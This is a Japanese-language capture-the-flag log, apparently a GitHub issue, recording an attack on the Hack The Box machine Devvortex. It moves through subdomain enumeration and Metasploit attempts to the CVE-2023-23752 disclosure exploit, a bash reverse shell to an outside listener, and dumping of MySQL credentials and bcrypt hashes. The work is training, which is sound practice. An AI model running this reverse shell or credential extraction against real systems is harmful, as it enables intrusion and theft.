Open roaris opened 2 months ago
http:\//10.10.11.242にアクセスすると、http:\//devvortex.htbにリダイレクトするので、/etc/hostsに以下を追記
10.10.11.242 devvortex.htb
レスポンス中にX-Powered-Byヘッダなし ページのソースを見ても重要な情報はなし
gobusterでは、/images/, /css/, /js/が出てきたけど、アクセスすると全て403が返される
$ gobuster dir --url http://devvortex.htb --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://devvortex.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 178] [--> http://devvortex.htb/images/]
/css (Status: 301) [Size: 178] [--> http://devvortex.htb/css/]
/js (Status: 301) [Size: 178] [--> http://devvortex.htb/js/]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
一応-fをつけてみたが、変わらず
$ gobuster dir --url http://devvortex.htb --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -f
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://devvortex.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images/ (Status: 403) [Size: 162]
/css/ (Status: 403) [Size: 162]
/js/ (Status: 403) [Size: 162]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
https://github.com/roaris/ctf-log/issues/36#issuecomment-2094652522 https://github.com/roaris/ctf-log/issues/36#issuecomment-2094657844 nginx 1.18については前も調べている
OpenSSH 8.2p1はexploit-dbで出てこない Google検索すると、https://www.cybersecurity-help.cz/vdb/SB2023072068 これが出てきて、よく分からんが多分攻撃条件を満たしていない
サブドメイン探索もした https://zenn.dev/sho00/articles/f089938def13ca ディレクトリ探索のdirをvhostに変えるだけで良いらしい
https://github.com/OJ/gobuster/blob/master/gobustervhost/gobustervhost.go Hostヘッダを<ワードリストの値>.devvortex.htbにして、レスポンスが返ってくるかを確かめているのかな とはいっても、出力されているのは全部400になっている... 全てドメイン名がスペース区切りになっているので、スペースが含まれている不正なHostヘッダということで、400になっているのかな
$ gobuster vhost --url http://devvortex.htb --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://devvortex.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: video games Status: 400 [Size: 166]
Found: cable tv Status: 400 [Size: 166]
Found: cell phones Status: 400 [Size: 166]
Found: long distance Status: 400 [Size: 166]
Found: nero 7 Status: 400 [Size: 166]
Found: spyware doctor Status: 400 [Size: 166]
Found: Michael Jackson - Thriller Status: 400 [Size: 166]
Found: Fall Out Boy - From Under The Cork Tree Status: 400 [Size: 166]
Found: DVD Tools Status: 400 [Size: 166]
Found: windows xp Status: 400 [Size: 166]
Found: 3 Popular Music Videos Status: 400 [Size: 166]
Found: Justin Timberlake - FutureSexyLoveSounds Status: 400 [Size: 166]
Found: ABBA - 15 albums Status: 400 [Size: 166]
Found: Westlife - The Love Album Status: 400 [Size: 166]
Found: Outside Out Status: 400 [Size: 166]
Found: The Kooks - Inside In Status: 400 [Size: 166]
Found: Oasis - 'Definitely Maybe' Status: 400 [Size: 166]
Found: Paolo Nutini - These Streets Status: 400 [Size: 166]
Found: The Beatles - Abbey Road Status: 400 [Size: 166]
Found: Il Divo - Siempre Status: 400 [Size: 166]
Found: The Beatles - Love Status: 400 [Size: 166]
Found: Akon - Konvicted Status: 400 [Size: 166]
Found: Guns N Roses - Appetite for Destruction Status: 400 [Size: 166]
Found: Razorlight - Razorlight Status: 400 [Size: 166]
Found: All popular movies 2006 Status: 400 [Size: 166]
Found: Dreamland 2006 Status: 400 [Size: 166]
Found: Tom and Jerry - Full Collection Status: 400 [Size: 166]
Found: Online TV Player Status: 400 [Size: 166]
Found: PowerArchiver 2006 Status: 400 [Size: 166]
Found: Most Popular Games Status: 400 [Size: 166]
Found: Battlefield 2142 Status: 400 [Size: 166]
Found: graphic design Status: 400 [Size: 166]
Found: System Tools Status: 400 [Size: 166]
Found: any dvd Status: 400 [Size: 166]
Found: Star Wars Status: 400 [Size: 166]
Found: google earth Status: 400 [Size: 166]
Found: Office Space Status: 400 [Size: 166]
Found: World of Warcraft Status: 400 [Size: 166]
Found: Nero 6 Status: 400 [Size: 166]
Found: Norton Internet Security 2006 Status: 400 [Size: 166]
Found: Video Editors Status: 400 [Size: 166]
Found: United States Status: 400 [Size: 166]
Found: photoshop cs2 Status: 400 [Size: 166]
Found: registry mechanic Status: 400 [Size: 166]
Found: web design Status: 400 [Size: 166]
Found: Real-Time Communication Status: 400 [Size: 166]
Found: Alien Shooter Status: 400 [Size: 166]
Found: Blender Foundation Status: 400 [Size: 166]
Found: About Blender Status: 400 [Size: 166]
Found: American Pie Status: 400 [Size: 166]
Found: Eszter Takacsi - Megaflood of Sets Status: 400 [Size: 166]
Found: American Pie 2 Status: 400 [Size: 166]
Found: American Wedding Status: 400 [Size: 166]
Found: Empire Earth II Status: 400 [Size: 166]
Found: Building Materials Status: 400 [Size: 166]
Found: Spy Sweeper Status: 400 [Size: 166]
Found: winrar 3 Status: 400 [Size: 166]
Found: Sony Vegas 6 Status: 400 [Size: 166]
Found: clone dvd Status: 400 [Size: 166]
Found: Registry Mechanic 5 Status: 400 [Size: 166]
Found: Comanche 4 Status: 400 [Size: 166]
Found: Check All Tracker Features! Status: 400 [Size: 166]
Found: Check Screenshots! Status: 400 [Size: 166]
Found: About Us Status: 400 [Size: 166]
Found: Contact Us Status: 400 [Size: 166]
Found: weight loss Status: 400 [Size: 166]
Found: North Korea Status: 400 [Size: 166]
Found: New York Status: 400 [Size: 166]
Found: amateur sex Status: 400 [Size: 166]
Found: jenna haze Status: 400 [Size: 166]
Found: Crazy Frog Status: 400 [Size: 166]
Found: Mariah Carey Status: 400 [Size: 166]
Found: My Chemical Romance Status: 400 [Size: 166]
Found: Paris Hilton Status: 400 [Size: 166]
Found: Nelly Furtado Status: 400 [Size: 166]
Found: Christina Aguilera Status: 400 [Size: 166]
Found: WinAVI Video Converter 7 Status: 400 [Size: 166]
Found: Picture 1 Status: 400 [Size: 166]
Found: I Tube Status: 400 [Size: 166]
Found: home entertainment Status: 400 [Size: 166]
Found: South Korea Status: 400 [Size: 166]
Found: bX Warez Status: 400 [Size: 166]
Found: Driver 3 Status: 400 [Size: 166]
Found: RTL Biathlon 2007 Status: 400 [Size: 166]
Found: Titan Quest Status: 400 [Size: 166]
Found: WinAVI Video Converter Status: 400 [Size: 166]
Found: RegDoctor 1 Status: 400 [Size: 166]
Found: Registry Mechanic Status: 400 [Size: 166]
Found: Kaspersky Anti-Hacker 1 Status: 400 [Size: 166]
Found: Internet Tools Status: 400 [Size: 166]
Found: Graphics Design Status: 400 [Size: 166]
Found: Selteco Flash Designer Status: 400 [Size: 166]
Found: Internet Download Manager Status: 400 [Size: 166]
Found: Codecs Media Plugins Status: 400 [Size: 166]
Found: Spyware Doctor Status: 400 [Size: 166]
Found: norton antivirus 2006 Status: 400 [Size: 166]
Found: Midtown Madness 2 Status: 400 [Size: 166]
Found: Need for Speed Most Wanted Status: 400 [Size: 166]
Found: alcohol 120 Status: 400 [Size: 166]
Found: The Godfather Status: 400 [Size: 166]
Found: South America Status: 400 [Size: 166]
Found: Roger Dubuis Status: 400 [Size: 166]
Found: Louis Vuitton Status: 400 [Size: 166]
Found: Vacheron Constantin Status: 400 [Size: 166]
Found: warcraft 3 cd key Status: 400 [Size: 166]
Found: nero 7 serial number Status: 400 [Size: 166]
Found: need for speed Status: 400 [Size: 166]
Found: nero 7 serial Status: 400 [Size: 166]
Found: Comodo - AntiPhishing Portfolio Status: 400 [Size: 166]
Found: Brien icon1113561605609 Status: 400 [Size: 166]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
詰んだので、Guided Mode
Task1 : How many open TCP ports are listening on Devvortex? A : 2
Task2: What subdomain is configured on the target's web server? Hint : When browsing to the web application, you are redirected to the devvortex.htb domain. Use a tool such as gobuster or ffuf to fuzz for common subdomains that respond differently.
いや、サブドメイン探索やったんだけど...
ワードリストを変えてみるも出てくる気配なし
$ gobuster vhost --url http://devvortex.htb --wordlist /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://devvortex.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 22292 / 100001 (22.29%)
https://github.com/OJ/gobuster/blob/master/gobustervhost/gobustervhost.go#L113-L119 --append-domainオプションをつけて実行しないと、Hostヘッダが<ワードリストの値>.devvortex.htbにならず、ワードリストの値そのものになってしまうようだ
$ gobuster vhost --url http://devvortex.htb --wordlist /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://devvortex.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.devvortex.htb Status: 200 [Size: 23221]
Progress: 221 / 100001 (0.22%)
dev.devvortex.htbが見つかった
以下を/etc/hostsに追記する
10.10.11.242 dev.devvortex.htb
Task2: What subdomain is configured on the target's web server? Hint : When browsing to the web application, you are redirected to the devvortex.htb domain. Use a tool such as gobuster or ffuf to fuzz for common subdomains that respond differently. A : dev.devvortex.htb
dev.devvortex.htbについてディレクトリ探索をする
$ gobuster dir --url http://dev.devvortex.htb --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://dev.devvortex.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/images/]
/home (Status: 200) [Size: 23221]
/media (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/media/]
/templates (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/templates/]
/modules (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/modules/]
/plugins (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/plugins/]
/includes (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/includes/]
/language (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/language/]
/components (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/components/]
/api (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/api/]
/cache (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/cache/]
/libraries (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/libraries/]
/tmp (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/tmp/]
/layouts (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/layouts/]
/administrator (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/administrator/]
/cli (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/cli/]
Progress: 26337 / 87665 (30.04%)
/administrator/にアクセスすると、ログインフォームが表示された Joomla!というCMSがあって、そのログインフォームのようだ exploit-dbでJoomla!を検索すると、大量に出てきて、どれを使ったらよいのか分からない レスポンスヘッダやページのソースからは、Joomla!のバージョンは分からなかった
exploit-dbでjoomla remote code execution
を検索する
https://www.exploit-db.com/exploits/44358 が使えそうに思った
しかし、metasploitで試すと動かない
msf6 > search joomla
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/joomla_gallerywd_sqli_scanner 2015-03-30 normal No Gallery WD for Joomla! Unauthenticated SQL Injection Scanner
1 exploit/unix/webapp/joomla_tinybrowser 2009-07-22 excellent Yes Joomla 1.5.12 TinyBrowser File Upload Code Execution
2 auxiliary/scanner/http/joomla_api_improper_access_checks 2023-02-01 normal Yes Joomla API Improper Access Checks
3 auxiliary/admin/http/joomla_registration_privesc 2016-10-25 normal Yes Joomla Account Creation and Privilege Escalation
4 exploit/unix/webapp/joomla_akeeba_unserialize 2014-09-29 excellent Yes Joomla Akeeba Kickstart Unserialize Remote Code Execution
5 auxiliary/scanner/http/joomla_bruteforce_login normal No Joomla Bruteforce Login Utility
6 exploit/unix/webapp/joomla_comfields_sqli_rce 2017-05-17 excellent Yes Joomla Component Fields SQLi Remote Code Execution
7 exploit/unix/webapp/joomla_comjce_imgmanager 2012-08-02 excellent Yes Joomla Component JCE File Upload Remote Code Execution 8 exploit/unix/webapp/joomla_contenthistory_sqli_rce 2015-10-23 excellent Yes Joomla Content History SQLi Remote Code Execution
9 exploit/multi/http/joomla_http_header_rce 2015-12-14 excellent Yes Joomla HTTP Header Unauthenticated Remote Code Execution
10 exploit/unix/webapp/joomla_media_upload_exec 2013-08-01 excellent Yes Joomla Media Manager File Upload Vulnerability
11 auxiliary/scanner/http/joomla_pages normal No Joomla Page Scanner
12 auxiliary/scanner/http/joomla_plugins normal No Joomla Plugins Scanner
13 auxiliary/gather/joomla_com_realestatemanager_sqli 2015-10-22 normal Yes Joomla Real Estate Manager Component Error-Based SQL Injection
14 auxiliary/scanner/http/joomla_version normal No Joomla Version Scanner
15 auxiliary/gather/joomla_contenthistory_sqli 2015-10-22 normal Yes Joomla com_contenthistory Error-Based SQL Injection
16 auxiliary/gather/joomla_weblinks_sqli 2014-03-02 normal Yes Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read
17 auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner 2015-03-20 normal No Web-Dorado ECommerce WD for Joomla! search_category_id SQL Injection Scanner
Interact with a module by name or index. For example info 17, use 17 or use auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner
msf6 > use exploit/unix/webapp/joomla_comfields_sqli_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > options
Module options (exploit/unix/webapp/joomla_comfields_sqli_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the Joomla application
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.23.73.202 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Joomla 3.7.0
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > set RHOSTS dev.devvortex.htb
RHOSTS => dev.devvortex.htb
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > set LHOST 10.10.14.42
LHOST => 10.10.14.42
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > exploit
[*] Started reverse TCP handler on 10.10.14.42:4444
[-] Exploit aborted due to failure: unknown: 10.10.11.242:80 - Error retrieving table prefix
[*] Exploit completed, but no session was created.
With the SQLi, it's possible to enumerate cookies of Administrator and Super User users, and hijack one of their sessions. If no Super User is authenticated, the RCE portion will not work.
と書いてあった
unix/webapp/joomla_contenthistory_sqli_rce も上手くいかなかった
msf6 exploit(unix/webapp/joomla_contenthistory_sqli_rce) > options
Module options (exploit/unix/webapp/joomla_contenthistory_sqli_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm
l
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to Joomla
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.23.73.202 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Joomla 3.x <= 3.4.4
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/joomla_contenthistory_sqli_rce) > set RHOSTS dev.devvortex.htb
RHOSTS => dev.devvortex.htb
msf6 exploit(unix/webapp/joomla_contenthistory_sqli_rce) > set LHOST 10.10.14.42
LHOST => 10.10.14.42
msf6 exploit(unix/webapp/joomla_contenthistory_sqli_rce) > exploit
[*] Started reverse TCP handler on 10.10.14.42:4444
[-] Exploit aborted due to failure: unknown: 10.10.11.242:80 - Error retrieving table prefix
[*] Exploit completed, but no session was created.
multi/http/joomla_http_header_rce も上手くいかなかった
msf6 exploit(multi/http/joomla_http_header_rce) > options
Module options (exploit/multi/http/joomla_http_header_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HEADER USER-AGENT yes The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm
l
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the Joomla application
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.23.73.202 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Joomla 1.5.0 - 3.4.5
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/joomla_http_header_rce) > set RHOSTS dev.devvortex.htb
RHOSTS => dev.devvortex.htb
msf6 exploit(multi/http/joomla_http_header_rce) > set LHOST 10.10.14.42
LHOST => 10.10.14.42
msf6 exploit(multi/http/joomla_http_header_rce) > exploit
[*] Started reverse TCP handler on 10.10.14.42:4444
[*] 10.10.11.242:80 - Sending payload ...
[*] Exploit completed, but no session was created.
また詰んだので、Guided Mode
Task3 : What Content Management System (CMS) is running on dev.devvortex.htb? A : Joomla
Task4 : Which version of Joomla is running on the target system? Hint : Joomla websites publicly disclose their version on a certain endpoint. A quick search using your search engine of choice will lead you to it.
レスポンスヘッダとかページソースからは分からなかったやつ
https://docs.joomla.org/How_to_check_the_Joomla_version%3F を見て、 http:\//dev.devvortex.htb/includes/joomla/version.php http:\//dev.devvortex.htb/libraries/joomla/version.php http:\//dev.devvortex.htb/template/system/css/template.css http:\//dev.devvortex.htb/template/system/css/system.css http:\//dev.devvortex.htb/languages/en-GB/en-GB.ini http:\//dev.devvortex.htb/libraries/cms/version/version.php http:\//dev.devvortex.htb/libraries/src/Version.php を確認したが、全て駄目だった
https://qiita.com/Brutus/items/71d3f0c157cb0f2f592a によると、administrator/manifests/files/joomla.xml にアクセスするとバージョン情報が確認出来るらしい こんなの公式ドキュメントに載ってなかったぞ...
https://book.hacktricks.xyz/v/jp/network-services-pentesting/pentesting-web/joomla にはadministrator/manifests/files/joomla.xmlの記載がある
Task4 : Which version of Joomla is running on the target system? Hint : Joomla websites publicly disclose their version on a certain endpoint. A quick search using your search engine of choice will lead you to it. A : 4.2.6
バージョン4.2.6なので、試したexploit3つともバージョンの条件を満たしていなかった
joomla 4.2.6 exploitでGoogle検索すると、https://github.com/Acceis/exploit-CVE-2023-23752 が見つかった searchsploitでスクリプトを持ってくる Rubyスクリプトなのに、拡張子が.pyになっている 実行すると成功した
$ searchsploit -m 51334
Exploit: Joomla! v4.2.8 - Unauthenticated information disclosure
URL: https://www.exploit-db.com/exploits/51334
Path: /usr/share/exploitdb/exploits/php/webapps/51334.py
Codes: CVE-2023-23752
Verified: True
File Type: Ruby script, ASCII text
$ mv 51334.py 51334.rb
$ gem install httpx docopt paint
Fetching httpx-1.2.4.gem
Fetching http-2-next-1.0.3.gem
Successfully installed http-2-next-1.0.3
Successfully installed httpx-1.2.4
Parsing documentation for http-2-next-1.0.3
Installing ri documentation for http-2-next-1.0.3
Parsing documentation for httpx-1.2.4
Installing ri documentation for httpx-1.2.4
Done installing documentation for http-2-next, httpx after 2 seconds
Fetching docopt-0.6.1.gem
Successfully installed docopt-0.6.1
Parsing documentation for docopt-0.6.1
Installing ri documentation for docopt-0.6.1
Done installing documentation for docopt after 0 seconds
Fetching paint-2.3.0.gem
Successfully installed paint-2.3.0
Parsing documentation for paint-2.3.0
Installing ri documentation for paint-2.3.0
Done installing documentation for paint after 0 seconds
4 gems installed
$ ruby 51334.rb http://dev.devvortex.htb
Users
[649] lewis (lewis) - lewis@devvortex.htb - Super Users
[650] logan paul (logan) - logan@devvortex.htb - Registered
Site info
Site name: Development
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false
Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: P4ntherg0t1n5r3c0n##
DB name: joomla
DB prefix: sd4fg_
DB encryption 0
lewis / P4ntherg0t1n5r3c0n##, logan / P4ntherg0t1n5r3c0n##, root / P4ntherg0t1n5r3c0n##, admin / P4ntherg0t1n5r3c0n## でhttp:\//dev.devvortex.htb/administratorのログインとSSHログインを試したが全て失敗した
また詰んだので、Guided Mode
Task5 : What is the 2023 CVE ID for an information disclosure vulnerability in the version of Joomla running on DevVortex? Hint : Search for terms like "joomla 4.2.6 information disclosure". A : CVE-2023-23752
Task6 : What is the lewis user's password for the CMS? Hint : Leverage the vulnerability to enumerate the service's configuration. There is a configuration endpoint that can be accessed using ?public=true that will leak a password. A : P4ntherg0t1n5r3c0n##
Task7 : What table in the database contains hashed credentials for the logan user? Hint : Use the admin access to the CMS to write a PHP shell to one of the templates and obtain an interactive shell on the target. From there, enumerate the local services and use what you already know to access them.
いや、lewisでログイン出来ないんだが...
マシン再起動したら、lewis / P4ntherg0t1n5r3c0n##でログイン出来た
コマンド実行したり、webshellが配置出来る場所を探す
見つけられないので、joomla webshellで調べると https://github.com/p0dalirius/Joomla-webshell-plugin が出てきた 手順通りにmod_webshell.phpをアップロードしようとすると、エラーになった
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/joomla#rce の方法も上手くいかない(そもそもClick on TemplatesのTemplatesが見つからない)
bash -c "bash -i >& /dev/tcp/10.10.14.42/4444 0>&1"
を実行して、リバースシェルが取れた
$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.42] from devvortex.htb [10.10.11.242] 38390
bash: cannot set terminal process group (860): Inappropriate ioctl for device
bash: no job control in this shell
www-data@devvortex:~/dev.devvortex.htb/administrator$
user.txtは読み取れない
www-data@devvortex:~/dev.devvortex.htb/administrator$ cd /home
cd /home
www-data@devvortex:/home$ ls
ls
logan
www-data@devvortex:/home$ cd logan
cd logan
www-data@devvortex:/home/logan$ ls
ls
user.txt
www-data@devvortex:/home/logan$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
前に実行したexploitの結果の中に
Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: P4ntherg0t1n5r3c0n##
とあるので、MySQLログインを試したが、反応がない
www-data@devvortex:~/dev.devvortex.htb/administrator$ mysql --version
mysql --version
mysql Ver 8.0.35-0ubuntu0.20.04.1 for Linux on x86_64 ((Ubuntu))
www-data@devvortex:~/dev.devvortex.htb/administrator$ mysql -u lewis -p
mysql -u lewis -p
Enter password: P4ntherg0t1n5r3c0n##
(反応なし)
https://qiita.com/Umbrage/items/9ae0698891583dffaf85 に書いてあるシェルの安定化というのをやったら、反応した
原理がさっぱり分からないが、マシン側でpython3 -c "import pty; pty.spawn('/bin/bash')"
を実行し、その後Ctrl+Zでマシンから抜ける
その後、ローカルでstty raw -echo; fg
とする
$ stty raw -echo; fg
[2] - continued nc -lvp 4444
www-data@devvortex:~/dev.devvortex.htb/administrator$ mysql -u lewis -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 41
Server version: 8.0.35-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
loganのハッシュ化されたパスワードを手に入れることが出来た
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
| performance_schema |
+--------------------+
3 rows in set (0.00 sec)
mysql> use joomla
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-------------------------------+
| Tables_in_joomla |
+-------------------------------+
| sd4fg_action_log_config |
| sd4fg_action_logs |
| sd4fg_action_logs_extensions |
| sd4fg_action_logs_users |
| sd4fg_assets |
| sd4fg_associations |
| sd4fg_banner_clients |
| sd4fg_banner_tracks |
| sd4fg_banners |
| sd4fg_categories |
| sd4fg_contact_details |
| sd4fg_content |
| sd4fg_content_frontpage |
| sd4fg_content_rating |
| sd4fg_content_types |
| sd4fg_contentitem_tag_map |
| sd4fg_extensions |
| sd4fg_fields |
| sd4fg_fields_categories |
| sd4fg_fields_groups |
| sd4fg_fields_values |
| sd4fg_finder_filters |
| sd4fg_finder_links |
| sd4fg_finder_links_terms |
| sd4fg_finder_logging |
| sd4fg_finder_taxonomy |
| sd4fg_finder_taxonomy_map |
| sd4fg_finder_terms |
| sd4fg_finder_terms_common |
| sd4fg_finder_tokens |
| sd4fg_finder_tokens_aggregate |
| sd4fg_finder_types |
| sd4fg_history |
| sd4fg_languages |
| sd4fg_mail_templates |
| sd4fg_menu |
| sd4fg_menu_types |
| sd4fg_messages |
| sd4fg_messages_cfg |
| sd4fg_modules |
| sd4fg_modules_menu |
| sd4fg_newsfeeds |
| sd4fg_overrider |
| sd4fg_postinstall_messages |
| sd4fg_privacy_consents |
| sd4fg_privacy_requests |
| sd4fg_redirect_links |
| sd4fg_scheduler_tasks |
| sd4fg_schemas |
| sd4fg_session |
| sd4fg_tags |
| sd4fg_template_overrides |
| sd4fg_template_styles |
| sd4fg_ucm_base |
| sd4fg_ucm_content |
| sd4fg_update_sites |
| sd4fg_update_sites_extensions |
| sd4fg_updates |
| sd4fg_user_keys |
| sd4fg_user_mfa |
| sd4fg_user_notes |
| sd4fg_user_profiles |
| sd4fg_user_usergroup_map |
| sd4fg_usergroups |
| sd4fg_users |
| sd4fg_viewlevels |
| sd4fg_webauthn_credentials |
| sd4fg_workflow_associations |
| sd4fg_workflow_stages |
| sd4fg_workflow_transitions |
| sd4fg_workflows |
+-------------------------------+
71 rows in set (0.01 sec)
mysql> select * from sd4fg_users;
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| id | name | username | email | password | block | sendEmail | registerDate | lastvisitDate | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset | authProvider |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| 649 | lewis | lewis | lewis@devvortex.htb | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u | 0 | 1 | 2023-09-25 16:44:24 | 2024-05-09 13:52:56 | 0 | | NULL | 0 | | | 0 | |
| 650 | logan paul | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 | 0 | 0 | 2023-09-26 19:15:42 | NULL | | {"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"} | NULL | 0 | | | 0 | |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
2 rows in set (0.00 sec)
Task7 : What table in the database contains hashed credentials for the logan user? Hint : Use the admin access to the CMS to write a PHP shell to one of the templates and obtain an interactive shell on the target. From there, enumerate the local services and use what you already know to access them. A : sd4fg_users
これどうやって元のパスワードに戻すんだ?ストレッチングされてたら厳しそうだが
$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
で検索してみたが、writeupしか出てこない
bcryptによるハッシュ値らしい https://qiita.com/daiki7010/items/b15de9ef747f5b23c984 https://www.tohoho-web.com/ex/crypt.html#bcrypt
